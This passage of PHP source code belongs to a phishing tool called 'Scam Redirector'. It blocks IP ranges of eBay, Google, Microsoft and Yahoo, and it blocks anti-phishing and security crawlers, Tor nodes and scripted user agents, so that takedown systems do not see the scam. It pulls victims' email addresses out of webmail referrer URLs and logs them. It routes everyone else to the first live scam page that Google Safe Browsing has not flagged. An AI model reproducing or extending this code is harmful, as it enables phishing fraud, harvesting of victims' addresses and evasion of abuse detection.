862* Function GetPhishtank will check if Scam Redirector was listed on Phishtank
863*
864* @param referrer Referrer
865* @param ip IP Address
866* @return Boolean value representing whether or not the visitor should been banned
867*/
868function GetPhishtank()
869{
870 $filename = 'phishtank.txt';
871 if (file_exists($filename)) {
872
873 $fh = fopen($filename, 'r');
874 $data = fread($fh, 1024);
875 fclose($fh);
876 return $data;
877 }else{
878$fh = fopen($filename, 'w') or die("Can't open file");
879fwrite($fh, 'No');
880fclose($fh);
881 return "No";
882 }
883}
884
885/**
886* Function GetEmail saves to (emails.txt) file the Email address from referrer, if found
887*
888* @param referrer Referrer
889* @param ip IP Address
890* @return Boolean value representing whether or not the visitor should been banned
891*/
892function GetEmail($referrer, $ip)
893{
894 if (!empty($referrer))
895 {
896 //Tiscali IT
897 $pos = strpos($referrer, ".tiscali.it");
898 if ($pos === false)
899 {
900 //
901 } else
902 {
903 $domain = get_between($referrer, "?d=", "&contentseed=");
904 $user = get_between($referrer, "&u=", "&targetcontainer=");
905 $email = $user."@".$domain;
906 }
907 //FASTWEB
908 $pos = strpos($referrer, ".fastwebnet.it");
909 if ($pos === false)
910 {
911 //
912 } else
913 {
914 $domain = get_between($referrer, "?d=", "&sh=");
915 $user = get_between($referrer, "&u=", "&an=");
916 $email = $user."@".$domain;
917 }
918 //Rediffmail Pro
919 $pos = strpos($referrer, ".rediffmailpro.com");
920 if ($pos === false)
921 {
922 //
923 } else
924 {
925 $email = get_between($referrer, "&login=", "&session_id=");
926 }
927
928 //MAYL.DE
929 $pos = strpos($referrer, ".mayl.de");
930 if ($pos === false)
931 {
932 //
933 } else
934 {
935 $email = get_between($referrer, "&username=", "&rfold=")."@mayl.de";
936 }
937
938 //handbag.com
939 $pos = strpos($referrer, ".handbag.com");
940 if ($pos === false)
941 {
942 //
943 } else
944 {
945 $email = get_between($referrer, "&userid=", "&seq=");
946 $email = str_replace("%40", "@", $email);
947 }
948 //Write to file
949 if ((CheckDuplicate($str, EMAILSFILE) == FALSE) && ($email <> "") && ($email <> "@"))
950 {
951 $fh = fopen(EMAILSFILE, 'a');
952 $str = "$ip - $email";
953 fwrite($fh, $str."\n");
954 fclose($fh);
955 }
956 }
957}
958
959/**
960* Function InitStats creates the the settings file, used to provide statistics
961*/
962function InitStats()
963{
964if (!file_exists('stats.txt'))
965 {
966 $fh = fopen('stats.txt', 'a');
967 fwrite($fh, time()."\n0\n0\n0\n10\n0\n");
968 fclose($fh);
969 }
970}
971
972/**
973* Function checkMatch check if the string matches our banned string
974*
975* @param str string
976* @param array Array with banned strings
977* @return Boolean value representing whether or not the visitor should been banned
978*/
979function readable_time($timestamp, $num_times = 2)
980{
981 //this returns human readable time when it was uploaded (array in seconds)
982 $times = array(31536000 => 'Year', 2592000 => 'Month', 604800 => 'Week', 86400 => 'Day', 3600 => 'Hour', 60 => 'Minute', 1 => 'Second');
983 $now = time();
984
985 /* Incorporates fix by Waylon */
986 $secs = $now - $timestamp;
987 //Fix so that something is always displayed
988 if ($secs == 0) {
989 $secs = 1;
990 }
991 /* /Waylon */
992
993 $count = 0;
994 $time = '';
995
996 foreach ($times AS $key => $value)
997 {
998 if ($secs >= $key)
999 {
1000 //time found
1001 $s = '';
1002 $time .= floor($secs / $key);
1003
1004 if ((floor($secs / $key) != 1))
1005 $s = 's';
1006
1007 $time .= ' ' . $value . $s;
1008 $count++;
1009 $secs = $secs % $key;
1010
1011 if ($count > $num_times - 1 || $secs == 0)
1012 break;
1013 else
1014 $time .= ', ';
1015 }
1016 }
1017 return $time;
1018}
1019
1020//Array with banned IPs, also 127.0.0.1 because somehow the IP can pe spoofed
1021$ban_array = array('202.76.240-202.76.247', '195.234.136', '66.77.136', '66.16.13.0-66.16.13.63', '66.135.192-66.135.223', '193.28.178', '217.159.130.168-217.159.130.175', '216.113.160-216.113.191', '216.33.244-216.33.247', '216.33.236-216.33.243', '66.211.160-66.211.191', '217.168.153-217.168.156', '66.249.64-66.249.95', '67.195', '66.227.16.0-66.227.16.127',
1022 '66.179.80.0-66.179.80.15', '209.147.112-209.147.127', '209.191.64-209.191.127', '64.111.96-64.111.127', '72.14.192.0-72.14.255.255', '174.237.1.1-174.237.255.255', '76.116.1.1-76.116.255.255',
1023 '208.67.157.213', '193.147.160-193.147.179', '207.34.136.103', '62.149.226.208',
1024 '12.90.64.238', '84.99.95', '150.70', '198.23.5', '166.68.134',
1025 '10.190.38.164', '75.125.130', '72.13.32-72.13.63', '128.232', '97.77.68.206',
1026 '220.97', '138.26', '38.98.19.111', '82.81', '144.214',
1027 '194.246.126-194.246.127', '77.124-77.127', '66.113.96-66.113.111',
1028 '203.5.112', '115.145', '124.180.239.165', '62.212.10.250',
1029 '159.149', '79.176-79.183', '62.67.240-62.67.241', '163.221', '91.121.64-91.121.143',
1030 '209.123.109.175', '209.123.192.187', '66.196.64-66.196.127', '208.109',
1031 '216.69.128-216.69.191', '72.244.219.54', '194.72.238', '192.76.82',
1032 '195.254.224-195.254.226', '74.55.44.237', '206.208.58', '149.20',
1033 '219.117.238.174', '212.102.67', '216.239.32-216.239.63', '64.114.199',
1034 '131.107', '74.53', '81.218', '91.199.104', '131.114',
1035 '78.129.140', '207.206.148', '165.166.47.186', '210.230.183', '59.188.106.242',
1036 '69.20.70.31', '209.235.254.107', '66.118.156-66.118.157', '66.230.220',
1037 '208.64.136-208.64.143', '209.120.218.128-209.120.218.255',
1038 '208.115.138-208.115.139', '216.128.11',
1039 '216.171.98.64-216.171.98.127', '66.16.13.59', '128.130', '212.27.36.1', '74.208',
1040 '219.127.103.193-219.127.103.254', '66.179.210.128-66.179.210.255', '195.214.79',
1041 '62.67.194', '66.16.13.55', '194.250.175',
1042 '82.80.128-82.80.159', '66.118.188.128-66.118.188.255', '62.219',
1043 '212.227.103.74', '209.131.32-209.131.63', '84.110.48-84.110.63', '72.37.244',
1044 '160.83', '65.52-65.55', '195.127.173.128-195.127.173.191', '24.123.240.186',
1045 '66.230.194', '98.64.68.139', '194.88.228-194.88.229', '64.41.151', '64.156.26',
1046 '65.17.248-65.17.255', '72.37.171', '60.248.169.142', '67.202',
1047 '174.129', '208.118.60', '72.44.32-72.44.63', '80.254.144-80.254.159', '141.212.110.65',
1048 '64.127.98.128', '8.6.118.7', '221.186.93.163', '217.212.224.128-217.212.224.255',
1049 '74.6', '193.47.80', '66.235.112-66.235.127', '204.187.65', '63.236.244-63.236.245',
1050 '211.78.130', '208.81.237.128-208.81.237.255', '194.106.220-194.106.221', '194.153.113', '8.21.4.254',
1051 '213.136.52.0-213.136.52.127', '192.18.0-192.18.194', '192.245.12', '69.36.252', '64.16.237',
1052 '88.80.205.192-88.80.205.223', '78.90.16.77', '143.215', '216.82.240-216.82.255',
1053 '208.80.200-208.80.207', '64.12.112', '195.93.18', '205.188.112', '207.200.112',
1054 '205.178.184-205.178.191', '165.212', '203.198', '81.173.0-81.173.127', '211.104-211.119',
1055 '219.76-219.79', '203.71-203.72', '61.208.232-61.208.255', '210.87.240-210.87.255', '220.255',
1056 '218.102-218.103', '141.217', '74.92.105.141', '144.137.8.170', '207.171.160-207.171.191',
1057 '98.130-98.131', '116.48-116.49', '195.93.64', '70.54.212.160-70.54.212.175', '208.87.136-208.87.139',
1058 '207.206.202-207.206.203', '12.1.231.96-12.1.231.127', '198.6.32-198.6.63', '66.193.242.5', '216.73.80-216.73.95',
1059 '216.185.96-216.185.127', '174.132-174.133', '66.223.0-66.223.127', '83.89.217.82', '208.80.192-208.80.199',
1060 '62.231.131', '72.30', '192.92.94', '38.100.41', '74.201.145',
1061 '212.117.160-212.117.175', '149.156.2', '220.233.112.41', '216.128.0-216.128.31', '62.241.4-62.241.5',
1062 '213.198.84.192-213.198.84.223', '217.114.220.0-217.114.220.63', '216.104.0-216.104.31', '86.17.163.200', '206.210.93',
1063 '216.145.24.13', '213.199.128-213.199.143', '193.108.72-193.108.79', '86.171.213.150', '213.161.88-213.161.89',
1064 '70.84-70.87', '204.16.206', '86.171.209.252', '78.129.174',
1065 '62.141.32-62.141.43', '124.43', '74.125', '85.158.136-85.158.143', '69.41.160-69.41.191',
1066 '62.189.112.128-62.189.112.255', '216.49.80-216.49.95', '38.105.71', '87.237.108', '74.63.64-74.63.127',
1067'67.159.0-67.159.63', '66.220.111', '193.200.150', '213.186.32-213.186.63', '63.82.71.128-63.82.71.143', '83.221.114',
1068'64.127.96-64.127.127', '84.97.0.0-84.103.231.255', '195.212.29', '212.97.132-212.97.135', '85.17.56', '212.227.68-212.227.108',
1069 '50.16', '66.150.14', '109.65', '66.150.9.128-66.150.9.191', '62.99.77.165', '220.130.53.5', '62.249.178.200',
1070'69.36.190.48');
1071
1072$owner_array = array('eBay', 'eBay', 'eBay', 'Technology Universe, LLC', 'eBay', 'eBay', 'Skype Technologies OU', 'eBay', 'eBay', 'Microsoft Corp', 'eBay', 'MAN1 Network C', 'Google', 'Yahoo!');
1073
1074// '127.0.0.1',
1075//Define banned words found in hostname, UA & referrer
1076$bw = array('phish', 'clean-mx', 'libwww', 'clamav', 'wget', 'web-sniffer',
1077 '10.112.10.10', 'jakarta commons', 'siteadvisor.com', 'bezeqint', 'fraudwatch',
1078 'scampatmaker', 'urllib', 'brantect.com', 'm2k agetnt', 'showthread.php',
1079 '.blogspot.com', '.mailprotector.net', 'groups.yahoo.com', 'crawler', 'lwp::simple',
1080 'webwasher', 'w3m/', 'www-mechanize/', 'libcurl', 'google.com/search', 'www.google.com', '.ipt.aol.com', '"', 'lionic.com');
1081
1082//'.mailprotector.net' should be moved to the new updates in the future
1083
1084//Define banned words found in UA & referrer
1085$bua = array('', 'Mozilla/5.0 (compatible; en-us)', 'Mozilla/4.0 (compatible;)', 'Mozilla/4.0 (compatible)', 'Mozilla/4.0', 'Mozilla/6.0', '12345', 'Mozilla/3.01 (compatible;)', 'JetBrains 5.0', 'JetBrains 4.0', '.');
1086
1087//Suspicious IPs
1088$susp_array = array('203.27.226', '121.72.138.44', '209.244.4', '78.149.92.246',
1089'86.57.32-86.57.63', '131.215', '84.101.228.107', '207.157.0-207.157.127', '89.240.114.70',
1090'89.240', '205.209.128-205.209.191', '149.156', '86.171.153.79', '81.159.187.250');
1091
1092//Custom IPs
1093$custom_array = array('98.130-98.131');
1094
1095/*
1096Statistics
1097*/
1098//$array = file('stats.txt');
1099
1100$fh = fopen('stats.txt', 'r');
1101$data = fread($fh, 512);
1102$array = explode(",", $data);
1103fclose($fh);
1104
1105$tim = $array[0];
1106$vst = $array[1];
1107$unq = $array[2];
1108$bnd = $array[3];
1109$wat = $array[4];
1110$nor = $array[5];
1111
1112$vst = $vst + 1;
1113
1114if (checkUniqueIP($ip) == false)
1115{
1116 $fh = fopen('ip.txt', 'a');
1117 fwrite($fh, $ip."\n");
1118 fclose($fh);
1119 $unq = $unq + 1;
1120}
1121
1122function WriteStats($tim, $vst, $unq, $bnd, $wat, $nor)
1123{
1124 $fh = fopen('stats.txt', 'w');
1125 fwrite($fh, "$tim,$vst,$unq,$bnd,$wat,$nor");
1126 fclose($fh);
1127}
1128
1129//Returns the scam url with
1130function ScamURL($scams)
1131{
1132 for ($i = 0; $i <= count($scams) - 1; $i++)
1133 {
1134 //Download each scam page for checking
1135 /*
1136
1137 Warning: file_get_contents(the url) [function.file-get-contents]: failed to open stream: HTTP request failed! HTTP/1.1 500 Internal Server Error in file on line 1053
1138 */
1139 $scam_page = file_get_contents($scams[$i] . PATH);
1140
1141 //Add <ISONLINE VALUE=TRUE></ISONLINE> to your scam page
1142 $online = get_between($scam_page, "<ISONLINE VALUE=", "></ISONLINE>");
1143 if ($online == "TRUE")
1144 {
1145 //Check if it is blacklisted
1146 if (GOOG_ANTIPHISH == 1)
1147 {
1148 $goog_url = "http://sb.google.com/safebrowsing/lookup?sourceid=firefox-antiphish&features=TrustRank&client=navclient-auto-tbff&q=".$scams[$i].PATH;
1149 $google_page = file_get_contents($goog_url);
1150 $blacklisted = strpos($google_page, "phishy:1:1");
1151 if ($blacklisted === false)
1152 {
1153 $scam_url = $scams[$i] . PATH;
1154 return $scam_url;
1155 break;
1156 }
1157 } elseif (GOOG_ANTIPHISH == 0)
1158 {
1159 $scam_url = $scams[$i] . PATH;
1160 return $scam_url;
1161 break;
1162 }
1163
1164 }
1165 }
1166}
1167
1168//Write IP Address to On The Fly banning list
1169if (checkWord($hostname, $bw) || checkWord($agent, $bw) || checkWord($referrer, $bw))
1170{
1171 $file = "ip_ban.txt";
1172
1173 if (CheckDuplicate($ip, $file) == FALSE)
1174 {
1175 $fhandle = fopen($file, "a");
1176 fwrite($fhandle, $ip."\n");
1177 fclose($fhandle);
1178 }
1179}
1180
1181if (!checkMobile()){
1182 $file = "ip_ban.txt";
1183
1184 if (CheckDuplicate($ip, $file) == FALSE)
1185 {
1186 $fhandle = fopen($file, "a");
1187 fwrite($fhandle, $ip."\n");
1188 fclose($fhandle);
1189 }
1190}
1191
1192if (checkIP($ip, $susp_array))
1193{
1194 $fhandle = fopen(LOG_FILE, "a");
1195 fwrite($fhandle, "<font color=blue>" . $ip . " - " . $hostname . " - " . $dt . " - " . $agent . " - " . MailFromReferrer($referrer) . " - " . counter() . "</font><br/>");
1196 fclose($fhandle);
1197 $wat = $wat+1;
1198 WriteStats($tim, $vst, $unq, $bnd, $wat, $nor);
1199}
1200
1201if (checkIP($ip, $ban_array) || checkMatch($agent, $bua) || checkAsRedirect($referrer) || checkWord($hostname, $bw) || checkWord($agent, $bw) || checkWord($referrer, $bw) || checkTorNode($ip) || checkOnTheFlyBan($ip))
1202{
1203 $fhandle = fopen(LOG_FILE, "a");
1204 fwrite($fhandle, "<font color=red>" . $ip . " - " . $hostname . " - " . $dt . " - " . GetIPOwner($ip, $ban_array, $owner_array) ." - " . $agent . " - " . MailFromReferrer($referrer) . " - " . counter() .
1205 "</font><br/>");
1206 fclose($fhandle);
1207 $bnd = $bnd+1;
1208 WriteStats($tim, $vst, $unq, $bnd, $wat, $nor);
1209 header("Location: " . REDIRECT_TO);
1210} else
1211{
1212 GetEmail($referrer, $ip);
1213 $fhandle = fopen(LOG_FILE, "a");
1214 fwrite($fhandle, "<font color=green>" . $ip . "</font> - " . $hostname . " - " .
1215 $dt . " - " . $agent . " - " . MailFromReferrer($referrer) . " - " . counter() .
1216 "<br/>");
1217 fclose($fhandle);
1218 $nor = $nor+1;
1219 WriteStats($tim, $vst, $unq, $bnd, $wat, $nor);
1220
1221 $scam_url = ScamURL($scams);
1222 /*Need to modify this code, once ScamURL($scams) will return the last scam, then send email, one scam left messag and out of scams, send mail with smtp or mail*/
1223 //Send an email if you only have one scam!
1224 if ($send_email == 1)
1225 {
1226 if ($i == (count($scams) - 1))
1227 {
1228 //Send Email
1229 $fh = fopen('sent.txt', 'r');
1230 $data = fread($fh, 512);
1231 fclose($fh);
1232
1233 if ($data == 0) {
1234
1235 $subject = "ALERT: Scam Redirector (Out of Scams)";
1236 $date = date("Y-m-d");
1237 $message = "Your Scam Redirector is out of scams.<br /><br />URL: <a href=http://".$_SERVER['SERVER_NAME'].INDEX.">http://".$_SERVER['SERVER_NAME'].INDEX."</a><br />Version: ".VERSION."<br />Date: $date";
1238
1239 $headers = "MIME-Version: 1.0\r\n";
1240 $headers .= "Content-type: text/html; charset=iso-8859-1 \r\n";
1241 $headers .= "From: Scam Redirector <sss@scamredirector.cash>\r\n";
1242
1243 mail(EMAIL, stripslashes($subject), stripslashes($message), stripslashes($headers));
1244
1245 $fh = fopen('sent.txt', 'w');
1246 fwrite($fh, "1\n");
1247 fclose($fh);
1248 }
1249 } else
1250 {
1251 $fh = fopen('sent.txt', 'w');
1252 fwrite($fh, "0\n");
1253 fclose($fh);
1254 }
1255 }
1256
1257 if (!empty($scam_url))
1258 {
1259
1260 header("Location: " . $scam_url . "");
1261 } else
1262 {
1263
1264 header("Location: " . REDIRECT_TO);
1265 }
1266
1267}
1268?>